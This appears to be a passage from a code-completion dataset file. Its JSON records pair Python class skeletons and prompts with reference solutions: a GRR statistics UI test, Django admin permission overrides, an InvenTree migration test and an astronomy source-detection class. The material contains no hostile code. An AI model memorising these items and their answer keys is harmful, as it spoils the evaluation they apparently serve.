self.IsElementPresent('css=a[grrtarget=ReadOnlyForemanRuleTable]'))\n with self.ACLChecksDisabled():\n self.CreateAdminUser('test')\n self.Open('/')\n self.WaitUntil(self.IsElementPresent, 'client_query')\n self.WaitUntil(self.IsElementPresent, 'css=a[grrtarget=ReadOnlyForemanRuleTable]')\n 
self.Click(\"css=a:contains('Statistics')\")\n self.Click('css=#_Clients ins.jstree-icon')\n self.Click('css=#_Clients-OS_20Breakdown ins.jstree-icon')\n self.WaitUntil(self.IsElementPresent, 'css=#_Clients-OS_20Breakdown-_207_20Day_20Active')\n self.Click(\"css=li[path='/Clients/OS Breakdown/ 7 Day Active'] a\")\n self.WaitUntilEqual(u'No data Available', self.GetText, 'css=#main_rightPane h3')\n with self.ACLChecksDisabled():\n self.PopulateData()\n self.Click(\"css=li[path='/Clients/OS Breakdown/ 7 Day Active'] a\")\n self.WaitUntilEqual(u'Operating system break down.', self.GetText, 'css=#main_rightPane h3')\n<|end_body_1|>\n", "class_docstring": "Test the statistics interface.", "class_name": "TestStats", "detected_licenses": ["Apache-2.0", "DOC"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass TestStats:\n \"\"\"Test the statistics interface.\"\"\"\n\n def PopulateData():\n \"\"\"Populates data into the stats object.\"\"\"\n <|body_0|>\n\n def testStats(self):\n \"\"\"Test the statistics interface. Unfortunately this test is pretty lame because we can not look into the canvas object with selenium.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n token = access_control.ACLToken(username='test', reason='fixture')\n with aff4.FACTORY.Create('aff4:/stats/ClientFleetStats', 'ClientFleetStats', token=token) as fd:\n now = 1321057655\n for i in range(10, 15):\n histogram = fd.Schema.OS_HISTOGRAM(age=int((now + i * 60 * 60 * 24) * 1000000.0))\n for number in [1, 7, 14, 30]:\n graph = rdfvalue.Graph(title='%s day actives' % number)\n graph.Append(label='Windows', y_value=i + number)\n graph.Append(label='Linux', y_value=i * 2 + number)\n histogram.Append(graph)\n fd.AddAttribute(histogram)\n<|end_body_0|>\n\n<|body_start_1|>\n self.Open('/')\n self.WaitUntil(self.IsElementPresent, 'client_query')\n self.assert_(not self.IsElementPresent('css=a[grrtarget=ReadOnlyForemanRuleTable]'))\n with self.ACLChecksDisabled():\n self.CreateAdminUser('test')\n self.Open('/')\n self.WaitUntil(self.IsElementPresent, 'client_query')\n self.WaitUntil(self.IsElementPresent, 'css=a[grrtarget=ReadOnlyForemanRuleTable]')\n self.Click(\"css=a:contains('Statistics')\")\n self.Click('css=#_Clients ins.jstree-icon')\n self.Click('css=#_Clients-OS_20Breakdown ins.jstree-icon')\n self.WaitUntil(self.IsElementPresent, 'css=#_Clients-OS_20Breakdown-_207_20Day_20Active')\n self.Click(\"css=li[path='/Clients/OS Breakdown/ 7 Day Active'] a\")\n self.WaitUntilEqual(u'No data Available', self.GetText, 'css=#main_rightPane h3')\n with self.ACLChecksDisabled():\n self.PopulateData()\n self.Click(\"css=li[path='/Clients/OS Breakdown/ 7 Day Active'] a\")\n self.WaitUntilEqual(u'Operating system break down.', self.GetText, 'css=#main_rightPane h3')\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000049", "length_bytes": 2708, "license_type": "permissive", "methods": [{"docstring": "Populates data into the stats object.", "name": "PopulateData", "signature": "def PopulateData()"}, {"docstring": "Test the statistics interface. 
Unfortunately this test is pretty lame because we can not look into the canvas object with selenium.", "name": "testStats", "signature": "def testStats(self)"}], "n_methods": 2, "prompt": "Implement the Python class `TestStats` described below.\n\nClass description:\nTest the statistics interface.\n\nMethod signatures and docstrings:\n- def PopulateData(): Populates data into the stats object.\n- def testStats(self): Test the statistics interface. Unfortunately this test is pretty lame because we can not look into the canvas object with selenium.", "prompted_full_text": "Implement the Python class `TestStats` described below.\n\nClass description:\nTest the statistics interface.\n\nMethod signatures and docstrings:\n- def PopulateData(): Populates data into the stats object.\n- def testStats(self): Test the statistics interface. Unfortunately this test is pretty lame because we can not look into the canvas object with selenium.\n\n<|skeleton|>\nclass TestStats:\n \"\"\"Test the statistics interface.\"\"\"\n\n def PopulateData():\n \"\"\"Populates data into the stats object.\"\"\"\n <|body_0|>\n\n def testStats(self):\n \"\"\"Test the statistics interface. Unfortunately this test is pretty lame because we can not look into the canvas object with selenium.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n token = access_control.ACLToken(username='test', reason='fixture')\n with aff4.FACTORY.Create('aff4:/stats/ClientFleetStats', 'ClientFleetStats', token=token) as fd:\n now = 1321057655\n for i in range(10, 15):\n histogram = fd.Schema.OS_HISTOGRAM(age=int((now + i * 60 * 60 * 24) * 1000000.0))\n for number in [1, 7, 14, 30]:\n graph = rdfvalue.Graph(title='%s day actives' % number)\n graph.Append(label='Windows', y_value=i + number)\n graph.Append(label='Linux', y_value=i * 2 + number)\n histogram.Append(graph)\n fd.AddAttribute(histogram)\n<|end_body_0|>\n\n<|body_start_1|>\n self.Open('/')\n self.WaitUntil(self.IsElementPresent, 'client_query')\n self.assert_(not self.IsElementPresent('css=a[grrtarget=ReadOnlyForemanRuleTable]'))\n with self.ACLChecksDisabled():\n self.CreateAdminUser('test')\n self.Open('/')\n self.WaitUntil(self.IsElementPresent, 'client_query')\n self.WaitUntil(self.IsElementPresent, 'css=a[grrtarget=ReadOnlyForemanRuleTable]')\n self.Click(\"css=a:contains('Statistics')\")\n self.Click('css=#_Clients ins.jstree-icon')\n self.Click('css=#_Clients-OS_20Breakdown ins.jstree-icon')\n self.WaitUntil(self.IsElementPresent, 'css=#_Clients-OS_20Breakdown-_207_20Day_20Active')\n self.Click(\"css=li[path='/Clients/OS Breakdown/ 7 Day Active'] a\")\n self.WaitUntilEqual(u'No data Available', self.GetText, 'css=#main_rightPane h3')\n with self.ACLChecksDisabled():\n self.PopulateData()\n self.Click(\"css=li[path='/Clients/OS Breakdown/ 7 Day Active'] a\")\n self.WaitUntilEqual(u'Operating system break down.', self.GetText, 'css=#main_rightPane h3')\n<|end_body_1|>\n", "revision_id": "ba1648b97a76f844ffb8e1891cc9e2680f9b1c6e", "skeleton": "<|skeleton|>\nclass TestStats:\n \"\"\"Test the statistics interface.\"\"\"\n\n def PopulateData():\n \"\"\"Populates data into the stats object.\"\"\"\n <|body_0|>\n\n def testStats(self):\n \"\"\"Test the statistics interface. 
Unfortunately this test is pretty lame because we can not look into the canvas object with selenium.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class TestStats:\n \"\"\"Test the statistics interface.\"\"\"\n\n def PopulateData():\n \"\"\"Populates data into the stats object.\"\"\"\n token = access_control.ACLToken(username='test', reason='fixture')\n with aff4.FACTORY.Create('aff4:/stats/ClientFleetStats', 'ClientFleetStats', token=token) as fd:\n now = 1321057655\n for i in range(10, 15):\n histogram = fd.Schema.OS_HISTOGRAM(age=int((now + i * 60 * 60 * 24) * 1000000.0))\n for number in [1, 7, 14, 30]:\n graph = rdfvalue.Graph(title='%s day actives' % number)\n graph.Append(label='Windows', y_value=i + number)\n graph.Append(label='Linux', y_value=i * 2 + number)\n histogram.Append(graph)\n fd.AddAttribute(histogram)\n\n def testStats(self):\n \"\"\"Test the statistics interface. Unfortunately this test is pretty lame because we can not look into the canvas object with selenium.\"\"\"\n self.Open('/')\n self.WaitUntil(self.IsElementPresent, 'client_query')\n self.assert_(not self.IsElementPresent('css=a[grrtarget=ReadOnlyForemanRuleTable]'))\n with self.ACLChecksDisabled():\n self.CreateAdminUser('test')\n self.Open('/')\n self.WaitUntil(self.IsElementPresent, 'client_query')\n self.WaitUntil(self.IsElementPresent, 'css=a[grrtarget=ReadOnlyForemanRuleTable]')\n self.Click(\"css=a:contains('Statistics')\")\n self.Click('css=#_Clients ins.jstree-icon')\n self.Click('css=#_Clients-OS_20Breakdown ins.jstree-icon')\n self.WaitUntil(self.IsElementPresent, 'css=#_Clients-OS_20Breakdown-_207_20Day_20Active')\n self.Click(\"css=li[path='/Clients/OS Breakdown/ 7 Day Active'] a\")\n self.WaitUntilEqual(u'No data Available', self.GetText, 'css=#main_rightPane h3')\n with self.ACLChecksDisabled():\n self.PopulateData()\n self.Click(\"css=li[path='/Clients/OS Breakdown/ 7 Day Active'] a\")\n self.WaitUntilEqual(u'Operating system break down.', self.GetText, 'css=#main_rightPane h3')\n", "source": "the_stack_v2_python_sparse", "source_path": "gui/plugins/statistics_test.py", "source_repo": "defaultnamehere/grr", "split": "test", "star_events_count": 3} {"blob_id": "fd870f007d03036bafb3d1d54f73e97f37d00fa2", "bodies": ["if obj is None:\n return super(UseCaseAdminInLine, self).has_delete_permission(request, obj=None)\nelif (request.user == obj.created_by or request.user.has_perm('muo.can_edit_all')) and obj.status in ('draft', 'rejected'):\n return super(UseCaseAdminInLine, self).has_delete_permission(request, obj=None)\nelse:\n return False", "if obj is None:\n return super(UseCaseAdminInLine, self).get_readonly_fields(request, obj)\nelif (request.user == obj.created_by or request.user.has_perm('muo.can_edit_all')) and obj.status == 'draft':\n return super(UseCaseAdminInLine, self).get_readonly_fields(request, obj)\nelse:\n return list(set([field.name for field in self.opts.local_fields] + [field.name for field in self.opts.local_many_to_many]))", "if obj is None:\n return super(UseCaseAdminInLine, self).get_max_num(request, obj=None, **kwargs)\nelif (request.user == obj.created_by or request.user.has_perm('muo.can_edit_all')) and obj.status == 'draft':\n return super(UseCaseAdminInLine, self).get_max_num(request, obj=None, **kwargs)\nelse:\n return 0"], "bodies_text": "<|body_start_0|>\n if obj is None:\n return super(UseCaseAdminInLine, self).has_delete_permission(request, obj=None)\n 
elif (request.user == obj.created_by or request.user.has_perm('muo.can_edit_all')) and obj.status in ('draft', 'rejected'):\n return super(UseCaseAdminInLine, self).has_delete_permission(request, obj=None)\n else:\n return False", "if obj is None:\n return super(UseCaseAdminInLine, self).get_readonly_fields(request, obj)\nelif (request.user == obj.created_by or request.user.has_perm('muo.can_edit_all')) and obj.status == 'draft':\n return super(UseCaseAdminInLine, self).get_readonly_fields(request, obj)\nelse:\n return list(set([field.name for field in self.opts.local_fields] + [field.name for field in self.opts.local_many_to_many]))", "if obj is None:\n return super(UseCaseAdminInLine, self).get_max_num(request, obj=None, **kwargs)\nelif (request.user == obj.created_by or request.user.has_perm('muo.can_edit_all')) and obj.status == 'draft':\n return super(UseCaseAdminInLine, self).get_max_num(request, obj=None, **kwargs)\nelse:\n return 0"], "bodies_text": "<|body_start_0|>\n if obj is None:\n return super(UseCaseAdminInLine, self).has_delete_permission(request, obj=None)\n elif (request.user == obj.created_by or request.user.has_perm('muo.can_edit_all')) and obj.status in ('draft', 'rejected'):\n return super(UseCaseAdminInLine, self).has_delete_permission(request, obj=None)\n else:\n return False\n<|end_body_0|>\n\n<|body_start_1|>\n if obj is None:\n return super(UseCaseAdminInLine, self).get_readonly_fields(request, obj)\n elif (request.user == obj.created_by or request.user.has_perm('muo.can_edit_all')) and obj.status == 'draft':\n return super(UseCaseAdminInLine, self).get_readonly_fields(request, obj)\n else:\n return list(set([field.name for field in self.opts.local_fields] + [field.name for field in self.opts.local_many_to_many]))\n<|end_body_1|>\n\n<|body_start_2|>\n if obj is None:\n return super(UseCaseAdminInLine, self).get_max_num(request, obj=None, **kwargs)\n elif (request.user == obj.created_by or request.user.has_perm('muo.can_edit_all')) and obj.status == 'draft':\n return super(UseCaseAdminInLine, self).get_max_num(request, obj=None, **kwargs)\n else:\n return 0\n<|end_body_2|>\n", "class_docstring": "", "class_name": "UseCaseAdminInLine", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass UseCaseAdminInLine:\n\n def has_delete_permission(self, request, obj=None):\n \"\"\"Overriding the method such that the delete option on the UseCaseAdminInline form on change form is not available for the users except the original author or users with 'can_edit_all' permission. The delete option is only available to the original author or users with 'can_edit_all' permission if the related MUOContainer is in draft or rejected state\"\"\"\n <|body_0|>\n\n def get_readonly_fields(self, request, obj=None):\n \"\"\"Overriding the method such that all the fields on the UseCaseAdminInline form on change form are read-only for all the users except the original author or users with 'can_edit_all' permission. Only the original author or users with 'can_edit_all' permission can edit the fields, and only when the related MUOContainer is in the 'draft' state\"\"\"\n <|body_1|>\n\n def get_max_num(self, request, obj=None, **kwargs):\n \"\"\"Overriding the method such that the 'Add another Use Case' option on the UseCaseAdminInline form on change form is not available for the users except the original author or users with 'can_edit_all' permission. 
The 'Add another UseCase' option is only available to the original author or users with 'can_edit_all' permission if the related MUOContainer is in draft state\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if obj is None:\n return super(UseCaseAdminInLine, self).has_delete_permission(request, obj=None)\n elif (request.user == obj.created_by or request.user.has_perm('muo.can_edit_all')) and obj.status in ('draft', 'rejected'):\n return super(UseCaseAdminInLine, self).has_delete_permission(request, obj=None)\n else:\n return False\n<|end_body_0|>\n\n<|body_start_1|>\n if obj is None:\n return super(UseCaseAdminInLine, self).get_readonly_fields(request, obj)\n elif (request.user == obj.created_by or request.user.has_perm('muo.can_edit_all')) and obj.status == 'draft':\n return super(UseCaseAdminInLine, self).get_readonly_fields(request, obj)\n else:\n return list(set([field.name for field in self.opts.local_fields] + [field.name for field in self.opts.local_many_to_many]))\n<|end_body_1|>\n\n<|body_start_2|>\n if obj is None:\n return super(UseCaseAdminInLine, self).get_max_num(request, obj=None, **kwargs)\n elif (request.user == obj.created_by or request.user.has_perm('muo.can_edit_all')) and obj.status == 'draft':\n return super(UseCaseAdminInLine, self).get_max_num(request, obj=None, **kwargs)\n else:\n return 0\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000050", "length_bytes": 18243, "license_type": "no_license", "methods": [{"docstring": "Overriding the method such that the delete option on the UseCaseAdminInline form on change form is not available for the users except the original author or users with 'can_edit_all' permission. The delete option is only available to the original author or users with 'can_edit_all' permission if the related MUOContainer is in draft or rejected state", "name": "has_delete_permission", "signature": "def has_delete_permission(self, request, obj=None)"}, {"docstring": "Overriding the method such that all the fields on the UseCaseAdminInline form on change form are read-only for all the users except the original author or users with 'can_edit_all' permission. Only the original author or users with 'can_edit_all' permission can edit the fields, and only when the related MUOContainer is in the 'draft' state", "name": "get_readonly_fields", "signature": "def get_readonly_fields(self, request, obj=None)"}, {"docstring": "Overriding the method such that the 'Add another Use Case' option on the UseCaseAdminInline form on change form is not available for the users except the original author or users with 'can_edit_all' permission. The 'Add another UseCase' option is only available to the original author or users with 'can_edit_all' permission if the related MUOContainer is in draft state", "name": "get_max_num", "signature": "def get_max_num(self, request, obj=None, **kwargs)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_007088", "prompt": "Implement the Python class `UseCaseAdminInLine` described below.\n\nClass description:\nImplement the UseCaseAdminInLine class.\n\nMethod signatures and docstrings:\n- def has_delete_permission(self, request, obj=None): Overriding the method such that the delete option on the UseCaseAdminInline form on change form is not available for the users except the original author or users with 'can_edit_all' permission. 
The delete option is only available to the original author or users with 'can_edit_all' permission if the related MUOContainer is in draft or rejected state\n- def get_readonly_fields(self, request, obj=None): Overriding the method such that all the fields on the UseCaseAdminInline form on change form are read-only for all the users except the original author or users with 'can_edit_all' permission. Only the original author or users with 'can_edit_all' permission can edit the fields, and only when the related MUOContainer is in the 'draft' state\n- def get_max_num(self, request, obj=None, **kwargs): Overriding the method such that the 'Add another Use Case' option on the UseCaseAdminInline form on change form is not available for the users except the original author or users with 'can_edit_all' permission. The 'Add another UseCase' option is only available to the original author or users with 'can_edit_all' permission if the related MUOContainer is in draft state", "prompted_full_text": "Implement the Python class `UseCaseAdminInLine` described below.\n\nClass description:\nImplement the UseCaseAdminInLine class.\n\nMethod signatures and docstrings:\n- def has_delete_permission(self, request, obj=None): Overriding the method such that the delete option on the UseCaseAdminInline form on change form is not available for the users except the original author or users with 'can_edit_all' permission. The delete option is only available to the original author or users with 'can_edit_all' permission if the related MUOContainer is in draft or rejected state\n- def get_readonly_fields(self, request, obj=None): Overriding the method such that all the fields on the UseCaseAdminInline form on change form are read-only for all the users except the original author or users with 'can_edit_all' permission. Only the original author or users with 'can_edit_all' permission can edit the fields, and only when the related MUOContainer is in the 'draft' state\n- def get_max_num(self, request, obj=None, **kwargs): Overriding the method such that the 'Add another Use Case' option on the UseCaseAdminInline form on change form is not available for the users except the original author or users with 'can_edit_all' permission. The 'Add another UseCase' option is only available to the original author or users with 'can_edit_all' permission if the related MUOContainer is in draft state\n\n<|skeleton|>\nclass UseCaseAdminInLine:\n\n def has_delete_permission(self, request, obj=None):\n \"\"\"Overriding the method such that the delete option on the UseCaseAdminInline form on change form is not available for the users except the original author or users with 'can_edit_all' permission. The delete option is only available to the original author or users with 'can_edit_all' permission if the related MUOContainer is in draft or rejected state\"\"\"\n <|body_0|>\n\n def get_readonly_fields(self, request, obj=None):\n \"\"\"Overriding the method such that all the fields on the UseCaseAdminInline form on change form are read-only for all the users except the original author or users with 'can_edit_all' permission. 
Only the original author or users with 'can_edit_all' permission can edit the fields, and only when the related MUOContainer is in the 'draft' state\"\"\"\n <|body_1|>\n\n def get_max_num(self, request, obj=None, **kwargs):\n \"\"\"Overriding the method such that the 'Add another Use Case' option on the UseCaseAdminInline form on change form is not available for the users except the original author or users with 'can_edit_all' permission. The 'Add another UseCase' option is only available to the original author or users with 'can_edit_all' permission if the related MUOContainer is in draft state\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if obj is None:\n return super(UseCaseAdminInLine, self).has_delete_permission(request, obj=None)\n elif (request.user == obj.created_by or request.user.has_perm('muo.can_edit_all')) and obj.status in ('draft', 'rejected'):\n return super(UseCaseAdminInLine, self).has_delete_permission(request, obj=None)\n else:\n return False\n<|end_body_0|>\n\n<|body_start_1|>\n if obj is None:\n return super(UseCaseAdminInLine, self).get_readonly_fields(request, obj)\n elif (request.user == obj.created_by or request.user.has_perm('muo.can_edit_all')) and obj.status == 'draft':\n return super(UseCaseAdminInLine, self).get_readonly_fields(request, obj)\n else:\n return list(set([field.name for field in self.opts.local_fields] + [field.name for field in self.opts.local_many_to_many]))\n<|end_body_1|>\n\n<|body_start_2|>\n if obj is None:\n return super(UseCaseAdminInLine, self).get_max_num(request, obj=None, **kwargs)\n elif (request.user == obj.created_by or request.user.has_perm('muo.can_edit_all')) and obj.status == 'draft':\n return super(UseCaseAdminInLine, self).get_max_num(request, obj=None, **kwargs)\n else:\n return 0\n<|end_body_2|>\n", "revision_id": "d9b330ef70b0d0985bfc8248612ba57ee46ff0f4", "skeleton": "<|skeleton|>\nclass UseCaseAdminInLine:\n\n def has_delete_permission(self, request, obj=None):\n \"\"\"Overriding the method such that the delete option on the UseCaseAdminInline form on change form is not available for the users except the original author or users with 'can_edit_all' permission. The delete option is only available to the original author or users with 'can_edit_all' permission if the related MUOContainer is in draft or rejected state\"\"\"\n <|body_0|>\n\n def get_readonly_fields(self, request, obj=None):\n \"\"\"Overriding the method such that all the fields on the UseCaseAdminInline form on change form are read-only for all the users except the original author or users with 'can_edit_all' permission. Only the original author or users with 'can_edit_all' permission can edit the fields, and only when the related MUOContainer is in the 'draft' state\"\"\"\n <|body_1|>\n\n def get_max_num(self, request, obj=None, **kwargs):\n \"\"\"Overriding the method such that the 'Add another Use Case' option on the UseCaseAdminInline form on change form is not available for the users except the original author or users with 'can_edit_all' permission. 
The 'Add another UseCase' option is only available to the original author or users with 'can_edit_all' permission if the related MUOContainer is in draft state\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class UseCaseAdminInLine:\n def has_delete_permission(self, request, obj=None):\n \"\"\"Overriding the method such that the delete option on the UseCaseAdminInline form on change form is not available for the users except the original author or users with 'can_edit_all' permission. The delete option is only available to the original author or users with 'can_edit_all' permission if the related MUOContainer is in draft or rejected state\"\"\"\n if obj is None:\n return super(UseCaseAdminInLine, self).has_delete_permission(request, obj=None)\n elif (request.user == obj.created_by or request.user.has_perm('muo.can_edit_all')) and obj.status in ('draft', 'rejected'):\n return super(UseCaseAdminInLine, self).has_delete_permission(request, obj=None)\n else:\n return False\n\n def get_readonly_fields(self, request, obj=None):\n \"\"\"Overriding the method such that all the fields on the UseCaseAdminInline form on change form are read-only for all the users except the original author or users with 'can_edit_all' permission. Only the original author or users with 'can_edit_all' permission can edit the fields that too when the related MUOContainer is in the 'draft' state\"\"\"\n if obj is None:\n return super(UseCaseAdminInLine, self).get_readonly_fields(request, obj)\n elif (request.user == obj.created_by or request.user.has_perm('muo.can_edit_all')) and obj.status == 'draft':\n return super(UseCaseAdminInLine, self).get_readonly_fields(request, obj)\n else:\n return list(set([field.name for field in self.opts.local_fields] + [field.name for field in self.opts.local_many_to_many]))\n\n def get_max_num(self, request, obj=None, **kwargs):\n \"\"\"Overriding the method such that the 'Add another Use Case' option on the UseCaseAdminInline form on change form is not available for the users except the original author or users with 'can_edit_all' permission. 
The 'Add another UseCase' option is only available to the original author or users with 'can_edit_all' permission if the related MUOContainer is in draft state\"\"\"\n if obj is None:\n return super(UseCaseAdminInLine, self).get_max_num(request, obj=None, **kwargs)\n elif (request.user == obj.created_by or request.user.has_perm('muo.can_edit_all')) and obj.status == 'draft':\n return super(UseCaseAdminInLine, self).get_max_num(request, obj=None, **kwargs)\n else:\n return 0\n", "source": "the_stack_v2_python_sparse", "source_path": "Code/EnhanceCWE-master/muo/admin.py", "source_repo": "happinesstaker/more-website", "split": "test", "star_events_count": 0} {"blob_id": "635c5bee25dbb5c2f14c3e1cb6c16f805c9dc727", "bodies": ["Company = self.old_state.apps.get_model('company', 'company')\ncustomer = Company.objects.create(name='My customer', description='A customer we sell stuff too', is_customer=True)\nSalesOrder = self.old_state.apps.get_model('order', 'salesorder')\nfor ii in range(5):\n order = SalesOrder.objects.create(reference=f'SO{ii}', customer=customer, description='A sales order for stuffs', status=SalesOrderStatus.PENDING.value)\norder.save()\nwith self.assertRaises(LookupError):\n self.old_state.apps.get_model('order', 'salesordershipment')", "SalesOrder = self.new_state.apps.get_model('order', 'salesorder')\nShipment = self.new_state.apps.get_model('order', 'salesordershipment')\nself.assertEqual(SalesOrder.objects.count(), 5)\nself.assertEqual(Shipment.objects.count(), 5)"], "bodies_text": "<|body_start_0|>\n Company = self.old_state.apps.get_model('company', 'company')\n customer = Company.objects.create(name='My customer', description='A customer we sell stuff too', is_customer=True)\n SalesOrder = self.old_state.apps.get_model('order', 'salesorder')\n for ii in range(5):\n order = SalesOrder.objects.create(reference=f'SO{ii}', customer=customer, description='A sales order for stuffs', status=SalesOrderStatus.PENDING.value)\n order.save()\n with self.assertRaises(LookupError):\n self.old_state.apps.get_model('order', 'salesordershipment')\n<|end_body_0|>\n\n<|body_start_1|>\n SalesOrder = self.new_state.apps.get_model('order', 'salesorder')\n Shipment = self.new_state.apps.get_model('order', 'salesordershipment')\n self.assertEqual(SalesOrder.objects.count(), 5)\n self.assertEqual(Shipment.objects.count(), 5)\n<|end_body_1|>\n", "class_docstring": "Test data migration for the \"SalesOrderShipment\" model.", "class_name": "TestShipmentMigration", "detected_licenses": ["MIT", "LicenseRef-scancode-unknown-license-reference"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass TestShipmentMigration:\n \"\"\"Test data migration for the \"SalesOrderShipment\" model.\"\"\"\n\n def prepare(self):\n \"\"\"Create an initial SalesOrder.\"\"\"\n <|body_0|>\n\n def test_shipment_creation(self):\n \"\"\"Check that a SalesOrderShipment has been created.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n Company = self.old_state.apps.get_model('company', 'company')\n customer = Company.objects.create(name='My customer', description='A customer we sell stuff too', is_customer=True)\n SalesOrder = self.old_state.apps.get_model('order', 'salesorder')\n for ii in range(5):\n order = SalesOrder.objects.create(reference=f'SO{ii}', customer=customer, description='A sales order for stuffs', status=SalesOrderStatus.PENDING.value)\n order.save()\n with self.assertRaises(LookupError):\n self.old_state.apps.get_model('order', 
'salesordershipment')\n<|end_body_0|>\n\n<|body_start_1|>\n SalesOrder = self.new_state.apps.get_model('order', 'salesorder')\n Shipment = self.new_state.apps.get_model('order', 'salesordershipment')\n self.assertEqual(SalesOrder.objects.count(), 5)\n self.assertEqual(Shipment.objects.count(), 5)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000051", "length_bytes": 7688, "license_type": "permissive", "methods": [{"docstring": "Create an initial SalesOrder.", "name": "prepare", "signature": "def prepare(self)"}, {"docstring": "Check that a SalesOrderShipment has been created.", "name": "test_shipment_creation", "signature": "def test_shipment_creation(self)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_002114", "prompt": "Implement the Python class `TestShipmentMigration` described below.\n\nClass description:\nTest data migration for the \"SalesOrderShipment\" model.\n\nMethod signatures and docstrings:\n- def prepare(self): Create an initial SalesOrder.\n- def test_shipment_creation(self): Check that a SalesOrderShipment has been created.", "prompted_full_text": "Implement the Python class `TestShipmentMigration` described below.\n\nClass description:\nTest data migration for the \"SalesOrderShipment\" model.\n\nMethod signatures and docstrings:\n- def prepare(self): Create an initial SalesOrder.\n- def test_shipment_creation(self): Check that a SalesOrderShipment has been created.\n\n<|skeleton|>\nclass TestShipmentMigration:\n \"\"\"Test data migration for the \"SalesOrderShipment\" model.\"\"\"\n\n def prepare(self):\n \"\"\"Create an initial SalesOrder.\"\"\"\n <|body_0|>\n\n def test_shipment_creation(self):\n \"\"\"Check that a SalesOrderShipment has been created.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n Company = self.old_state.apps.get_model('company', 'company')\n customer = Company.objects.create(name='My customer', description='A customer we sell stuff too', is_customer=True)\n SalesOrder = self.old_state.apps.get_model('order', 'salesorder')\n for ii in range(5):\n order = SalesOrder.objects.create(reference=f'SO{ii}', customer=customer, description='A sales order for stuffs', status=SalesOrderStatus.PENDING.value)\n order.save()\n with self.assertRaises(LookupError):\n self.old_state.apps.get_model('order', 'salesordershipment')\n<|end_body_0|>\n\n<|body_start_1|>\n SalesOrder = self.new_state.apps.get_model('order', 'salesorder')\n Shipment = self.new_state.apps.get_model('order', 'salesordershipment')\n self.assertEqual(SalesOrder.objects.count(), 5)\n self.assertEqual(Shipment.objects.count(), 5)\n<|end_body_1|>\n", "revision_id": "e88a8e99a5f0b201c67a95cba097c729f090d5e2", "skeleton": "<|skeleton|>\nclass TestShipmentMigration:\n \"\"\"Test data migration for the \"SalesOrderShipment\" model.\"\"\"\n\n def prepare(self):\n \"\"\"Create an initial SalesOrder.\"\"\"\n <|body_0|>\n\n def test_shipment_creation(self):\n \"\"\"Check that a SalesOrderShipment has been created.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class TestShipmentMigration:\n \"\"\"Test data migration for the \"SalesOrderShipment\" model.\"\"\"\n\n def prepare(self):\n \"\"\"Create an initial SalesOrder.\"\"\"\n Company = self.old_state.apps.get_model('company', 'company')\n customer = Company.objects.create(name='My customer', description='A customer we sell stuff too', is_customer=True)\n SalesOrder = 
self.old_state.apps.get_model('order', 'salesorder')\n for ii in range(5):\n order = SalesOrder.objects.create(reference=f'SO{ii}', customer=customer, description='A sales order for stuffs', status=SalesOrderStatus.PENDING.value)\n order.save()\n with self.assertRaises(LookupError):\n self.old_state.apps.get_model('order', 'salesordershipment')\n\n def test_shipment_creation(self):\n \"\"\"Check that a SalesOrderShipment has been created.\"\"\"\n SalesOrder = self.new_state.apps.get_model('order', 'salesorder')\n Shipment = self.new_state.apps.get_model('order', 'salesordershipment')\n self.assertEqual(SalesOrder.objects.count(), 5)\n self.assertEqual(Shipment.objects.count(), 5)\n", "source": "the_stack_v2_python_sparse", "source_path": "InvenTree/order/test_migrations.py", "source_repo": "inventree/InvenTree", "split": "test", "star_events_count": 3077} {"blob_id": "d1fb5f84538822f6219b18608e3ece32372eef08", "bodies": ["super().__init__(max_n_sources)\nself.min_distance = min_distance\nself.threshold_scale = threshold_scale\nif use_band is None and (not use_mean):\n raise ValueError(\"Either set 'use_mean=True' OR indicate a 'use_band' index\")\nif use_band is not None and use_mean:\n raise ValueError(\"Only one of the parameters 'use_band' and 'use_mean' has to be set\")\nself.use_mean = use_mean\nself.use_band = use_band", "blend_image = blend_batch.blend_images[ii]\nif self.use_mean:\n image = np.mean(blend_image, axis=0)\nelse:\n image = blend_image[self.use_band]\nthreshold = self.threshold_scale * np.std(image)\ncoordinates = peak_local_max(image, min_distance=self.min_distance, threshold_abs=threshold)\nx, y = (coordinates[:, 1], coordinates[:, 0])\nwcs = blend_batch.wcs\nra, dec = wcs.pixel_to_world_values(x, y)\nra *= 3600\ndec *= 3600\ncatalog = Table()\ncatalog['ra'], catalog['dec'] = (ra, dec)\nreturn DeblendExample(self.max_n_sources, catalog)"], "bodies_text": "<|body_start_0|>\n super().__init__(max_n_sources)\n self.min_distance = min_distance\n self.threshold_scale = threshold_scale\n if use_band is None and (not use_mean):\n raise ValueError(\"Either set 'use_mean=True' OR indicate a 'use_band' index\")\n if use_band is not None and use_mean:\n raise ValueError(\"Only one of the parameters 'use_band' and 'use_mean' has to be set\")\n self.use_mean = use_mean\n self.use_band = use_band\n<|end_body_0|>\n\n<|body_start_1|>\n blend_image = blend_batch.blend_images[ii]\n if self.use_mean:\n image = np.mean(blend_image, axis=0)\n else:\n image = blend_image[self.use_band]\n threshold = self.threshold_scale * np.std(image)\n coordinates = peak_local_max(image, min_distance=self.min_distance, threshold_abs=threshold)\n x, y 